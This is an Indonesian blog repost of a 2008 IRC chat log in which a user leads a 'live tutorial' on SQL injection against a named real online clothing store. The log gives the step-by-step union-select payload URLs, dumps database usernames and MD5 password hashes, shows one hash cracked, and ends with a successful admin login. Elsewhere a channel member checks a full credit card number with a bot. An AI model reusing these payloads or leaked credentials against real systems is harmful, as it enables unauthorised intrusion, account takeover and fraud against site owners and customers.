Y00AOebLhlCX59D11qensmHJY7s SQL Injection Trick by home_edition2001 aka bius Created (c) by Princexells Seyka (Princelling Saki)

Minggu, 25 Agustus 2013

0 SQL Injection Trick by home_edition2001 aka bius

Sql Injection Advanced Live tutor
By home_edition2001 aka bius

<Ingin_belajar> judulnya apa nie bius?
<home_edition2001> sql injektion trik aja

Start of #nyubicrew buffer: Tue Oct 14 11:22:54 2008
<home_edition2001> http://www.cryingrevolversclothing.com/shop.php?PHPSESSID=06a574282ab316fafae73e6bf7570584&action=showCat&cid=22 >> ni url bugnya
<Ingin_belajar> ==============tutorial sql injek==============
<home_edition2001> karena lom cek link yang lain
<home_edition2001> knapa berbug
<home_edition2001> karena jika kita tambahkan dengan and 1=0 << erorrr jika and 1=1 normal again
<home_edition2001> dijamin 100% berbug
<home_edition2001> gimana injeksinya
<home_edition2001> xixi
<Ingin_belajar> http://www.cryingrevolversclothing.com/shop.php?PHPSESSID=06a574282ab316fafae73e6bf7570584&action=showCat&cid=22%20and%201=0
<Ingin_belajar> http://www.cryingrevolversclothing.com/shop.php?PHPSESSID=06a574282ab316fafae73e6bf7570584&action=showCat&cid=22%20and%201=1
<Ingin_belajar> kek gitu bos?
<home_edition2001> erorr kan Ingin_belajar
<home_edition2001> hooh
<Ingin_belajar> sep
<Ingin_belajar> ilang gambarnya
<home_edition2001> kondisinya dinyatakan berbug
<home_edition2001> cari nilai union dengan cara pake order by
<home_edition2001> gimana susunannya
<arif> wew
<home_edition2001> http://www.cryingrevolversclothing.com/shop.php?PHPSESSID=06a574282ab316fafae73e6bf7570584&action=showCat&cid=22 order by 1--
<home_edition2001> coba lo liat
<home_edition2001> apa hasilnya
<kaka11> +order+by+100--
<home_edition2001> normal ga
<home_edition2001> kaka11 kejauhan itu
<home_edition2001> klo 100 mah
<kaka11> kan buat tes dolo
<home_edition2001> hooh
<home_edition2001> gpp se
<kaka11> bisa pake itu apa ga
<home_edition2001> bener2 juga
<krupuk> ewewe
<Ingin_belajar> eror
<kaka11> karana ga semua bisa ka bozkekekek
<Ingin_belajar> kok gak keluar gambarnya
<home_edition2001> klo dikasih order by 1-- << normal dan order by 100-- erorr
<kaka11> nah
<anak_ciamis> error jg
<kaka11> itu buat perbandingan
<home_edition2001> berarti union terletak antara 1 - 100
<anak_ciamis> order by 1
<home_edition2001> gak dodol
<home_edition2001> anak_ciamis gak dodol
<home_edition2001> xixi
<home_edition2001> gimana biar gak erorr
<kaka11> cari yg terdekat yg ga eror
<Ingin_belajar> Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in
  /srv/www/vhosts/cryingrevolversclothing.com/httpdocs/include/databasefunction.inc.php on line 17
<Ingin_belajar> Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in
  /srv/www/vhosts/cryingrevolversclothing.com/httpdocs/include/databasefunction.inc.php on line 17
<Ingin_belajar> oo
<home_edition2001> ganti -- dengan /*
<home_edition2001> wakka
<home_edition2001> coba liat
<home_edition2001> xixi
<home_edition2001> cuman dikit kreatif kan
<home_edition2001> bebas kan otakmu
<kaka11> logus
<kaka11> logis
<kaka11> buakakaka
<anak_ciamis> wkwkw
<anak_ciamis> wkwkkwkw
<anak_ciamis> kw
<anak_ciamis> wk
<anak_ciamis> hihih
<kaka11> emang di krangkeng
<kaka11> kekekek
<home_edition2001> bener ga anak_ciamis
<anak_ciamis> bener
<anak_ciamis> hihi
<home_edition2001> xixi
<home_edition2001> gw gitu lo
<home_edition2001> xixi
<Firewall> !zip 48240
<anak_ciamis> iyaa
<home_edition2001> kadang2 pake spasi gak isa pake + sama /**/ bisa
<Ingin_belajar> angkanya kemana?
<home_edition2001> wakak
<home_edition2001> itulah namanya erorr
<Ingin_belajar> oo
<home_edition2001> gak kaya rumus matematika
<home_edition2001> 1+1 =2
<home_edition2001> itu udah jadi standart
<home_edition2001> waakaka
<kaka11> wekekeke
<kaka11> ya iya lah
<Ingin_belajar> jadi targetnya gmn bos
<home_edition2001> gimana
<kaka11> msa ya iya pret
<Ingin_belajar> gw masih bingung
<home_edition2001> udah ada yang bisa injeksi target tersebut
<swim_pack> gaul gitu looooooooh
<home_edition2001> bingung knapa cinta
<Ingin_belajar> angka 1 nya gak keluar?
<home_edition2001> xixi
<home_edition2001> keluar kok lo nya aja gak liat
<home_edition2001> xixixi
<home_edition2001> coba 1 lo ganti nama lo
<kaka11> buakakaka
<home_edition2001> dalam tulisan hexa
<Co`Bete> ew
<Co`Bete> kkekekkeke
<Co`Bete> 0100101101
<Co`Bete> ixiixixixix
<home_edition2001> Ingin_belajar << ini kan ascii 496E67696E5F62656C616A6172 << ini hexanya
<home_edition2001> nah gimana kita tau letak keluar querynya
<home_edition2001> <+Co`Bete> 0100101101 << inimah biner om
<Co`Bete> huwhuawhuawha
<kaos> letak dmana tu
<cintahhh> bos lonte datang, hormaaaaat
<home_edition2001> http://www.cryingrevolversclothing.com/shop.php?PHPSESSID=06a574282ab316fafae73e6bf7570584&action=showCat&cid=22 union select 0x496E67696E5F62656C616A6172/*
<home_edition2001> coba lo taro itu di url
<home_edition2001> trus klik kanan view source
<home_edition2001> cari nama Ingin_belajar
<home_edition2001> xixi
<home_edition2001> nemu ga bos
<Ingin_belajar> bentar bos
<kaos> ada
<krupuk> <a href="shop.php?PHPSESSID=06a574282ab316fafae73e6bf7570584&amp;action=showArt&amp;id=Ingin_belajar&amp
  ;cid=22 union select 0x496E67696E5F62656C616A6172/*" class="thumblink"><img src="" alt="" /></a>
<home_edition2001>                     <a href="shop.php?PHPSESSID=06a574282ab316fafae73e6bf7570584&amp;action=showArt&amp;id=In
  gin_belajar&amp;cid=22 union select 0x496E67696E5F62656C616A6172/*" class="thumblink"><img src="" alt="" /></a>
<biadabs> bius taek
<home_edition2001> lonte iya kesel gw di rip molo ama dia
<biadabs> bius taek
<kaka11> wew
<swim_pack> id=Ingin_belajar&amp;cid=22
<biadabs> kimak loe
<home_edition2001> coba lo tambahin version
<biadabs> bius tutung
<lonte> we
<Ingin_belajar> dmn?
<biadabs> kimak na
<Ingin_belajar> nambahinnya
<home_edition2001> http://www.cryingrevolversclothing.com/shop.php?PHPSESSID=06a574282ab316fafae73e6bf7570584&act
  ion=showCat&cid=22 union select concat(version(),0x2d2d,0x496E67696E5F62656C616A6172/*
<biadabs> us bius
<home_edition2001> coba jalanin lagi
<biadabs> dicari riana tuh
<home_edition2001> trus cari nama Ingin_belajar
<home_edition2001> xixi
<home_edition2001> wew
<biadabs> bius dicari riana tuh
<home_edition2001> riana
<home_edition2001> my lovly
<biadabs> kangen katanya
<home_edition2001> in the net
<biadabs> disuruh hack YM orang
<biadabs> xixixixix
<kaos> sudah ga ada
<biadabs> dodol loe katanya
<biadabs> xixixixixix
<home_edition2001> ??
<home_edition2001> kaos nemu ga
<home_edition2001> versinya
<biadabs> bius tutung
<kaos> gimana tuh versinya
<home_edition2001> http://www.cryingrevolversclothing.com/shop.php?PHPSESSID=06a574282ab316fafae73e6bf7570584&act
  ion=showCat&cid=22 union select concat(version(),0x2d2d,0x496E67696E5F62656C616A6172)/*
<home_edition2001> lupa tanda kurungnya deket /*
<home_edition2001> xixi
<home_edition2001> sory
<home_edition2001>                     <a href="shop.php?PHPSESSID=06a574282ab316fafae73e6bf7570584&amp;action=showArt&amp;id=4.
  1.13--Ingin_belajar&amp;cid=22 union select concat(version(),0x2d2d,0x496E67696E5F62656C616A6172)/*"
  class="thumblink"><img src="" alt="" /></a>
<kaos> ada
<home_edition2001> xixi
<home_edition2001> mantab kan
<swim_pack> "shop.php?PHPSESSID=06a574282ab316fafae73e6bf7570584&amp;action=showArt&amp;id=4.1.13--Ingin_belajar&
  amp;cid=22 union select concat(version(),0x2d2d,0x496E67696E5F62656C616A6172)/
<home_edition2001> gw dah nemu ne
<home_edition2001> http://www.cryingrevolversclothing.com/shop.php?PHPSESSID=06a574282ab316fafae73e6bf7570584&act
  ion=showCat&cid=22%20union%20select%20concat(version(),0x2d2d,database(),0x2d2d,user(),0x2d2d,0x626975732077617
  32068657265,0x2d2d,username,0x2d2d,password)%20from%20user/*
<home_edition2001> di tabel admin ada colom username ama password
<home_edition2001> sial versi 4 se
<home_edition2001> jadi gak isa liat tabel2 yang lain deh
<home_edition2001>                     <a href="shop.php?PHPSESSID=06a574282ab316fafae73e6bf7570584&amp;action=showArt&amp;id=4.
  [email protected] was here--root--e641681b4dbebd4c4dbcc3d96030db2b&amp;cid=22 union select
  concat(version(),0x2d2d,database(),0x2d2d,user(),0x2d2d,0x62697573207761732068657265,0x2d2d,username,0x2d2d,pas
  sword) from user/*" class="thumblink"><img src="" alt="" /></a>
<home_edition2001> tu hasilnya
<home_edition2001> root--e641681b4dbebd4c4dbcc3d96030db2b
<anti_hackerlink> Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in
  /srv/www/vhosts/cryingrevolversclothing.com/httpdocs/include/databasefunction.inc.php on line 17
<home_edition2001> coba pake group_concat
* A-1-D-S has joined #nyubicrew
<home_edition2001> http://www.cryingrevolversclothing.com/shop.php?PHPSESSID=06a574282ab316fafae73e6bf7570584&act
  ion=showCat&cid=22%20union%20select%20group_concat(version(),0x2d2d,database(),0x2d2d,user(),0x2d2d,0x626975732
  07761732068657265,0x2d2d,username,0x2d2d,password)%20from%20user/*
* flood-monitor sets mode: +l 138
* live sets mode: +v A-1-D-S
<home_edition2001>                     <a href="shop.php?PHPSESSID=06a574282ab316fafae73e6bf7570584&amp;action=showArt&amp;id=4.
  [email protected] was here--root--e641681b4dbebd4c4dbcc3d96030db2b,[email protected]
  s was here--Danny--e22a63fb76874c99488435f26b117e37,[email protected] was
  here--Flo--f916e76addc36657a6cd586acf400274,[email protected] was here--Strikes--9666301653325b0
  361aca9c0e04351f6&amp;cid=22 u
<home_edition2001> waa
<swim_pack> [email protected] was here--root--e641681b4dbebd4c4dbcc3d96030db2b,[email protected]
   was here--Danny--e22a63fb76874c99488435f26b117e37,[email protected] was
  here--Flo--f916e76addc36657a6cd586acf400274,[email protected] was here--Strikes--9666301653325b0
  361aca9c0e04351f6&amp;cid=22 union select group_concat(version(),0x2d2d,database(),0x2d2d,user(),0x2d2d,0x62697
  573207761732068657265,0x2d2d,username,0x
<home_edition2001> ada user danny
<home_edition2001> xixi
<home_edition2001> sapa tau usernay bisa di crack
<Ingin_belajar> 4.1.13--Ingin_belajar
<Ingin_belajar> weks baru nemu
<swim_pack> e22a63fb76874c99488435f26b117e37 <<< ini user nya yah om?
<home_edition2001> jiaka
<home_edition2001> Ingin_belajar kebanyakan coli yak
<home_edition2001> itu pasnya
<home_edition2001> e22a63fb76874c99488435f26b117e37    passwort
<swim_pack> user nya danny tadi?
<home_edition2001> jiakak
<home_edition2001> login2
<home_edition2001> login2
<home_edition2001> login2
<home_edition2001> login2
<home_edition2001> login2
<home_edition2001> login2
<home_edition2001> login2
* User69907 has joined #nyubicrew
<home_edition2001> Danny--passwort
<home_edition2001> xixi
<home_edition2001> coba cari login adminnya
* live sets mode: +v User69907
* flood-monitor sets mode: +l 139
<home_edition2001> http://www.cryingrevolversclothing.com/admin/
<home_edition2001> hajar
<home_edition2001> hajar
<home_edition2001> hajar
<home_edition2001> hajar
<home_edition2001> hajar
<swim_pack> "e22a63fb76874c99488435f26b117e37" resolves to
<swim_pack> passwort
<lonte> !google cryingrevolversclothing.com admin
<lonte> !ping me
<d_> Google search: There are no results.
<pekokpoLL> Lag reply pekokpoLL : 2 detik
<biadabs> xixixixixi]
<biadabs> ==a
<wakwawaokwaokw> om bius encrypt na dmn ?
<swim_pack> bisa login bang
* antalango has joined #nyubicrew
* flood-monitor sets mode: +l 140
<slap2begin> !chk 5400410000955894 0709 897
<cintahhh>  slap2begin :: CCnum -> 5400410000955894 is These Card has been checked Last time
* live sets mode: +v antalango
* lonte has quit IRC (Client exited on MILDNet )
<Ingin_belajar> ================tutor sampai disini------------------------

kata kata terakhir bius dalam live tutor kali ini:

<home_edition2001> http://www.cryingrevolversclothing.com/admin/index.php?PHPSESSID=e7e4c9ec32369447b93de38f9a152785
<home_edition2001> wakaka
<home_edition2001> bisa masuk
<home_edition2001> wekke
<home_edition2001> enaknya
<home_edition2001> sql injekl

Dedicated to #nyubicrew
Powered by Mildnet


Artikel Terkait

Ditulis Oleh : Nyubi Crew

Artikel SQL Injection Trick by home_edition2001 aka bius ini ditulis oleh Nyubi Crew pada hari Minggu, 25 Agustus 2013. Terimakasih atas kunjungan Anda pada blog ini. Kritik dan saran tentang SQL Injection Trick by home_edition2001 aka bius dapat Anda sampaikan melalui kotak komentar diatas.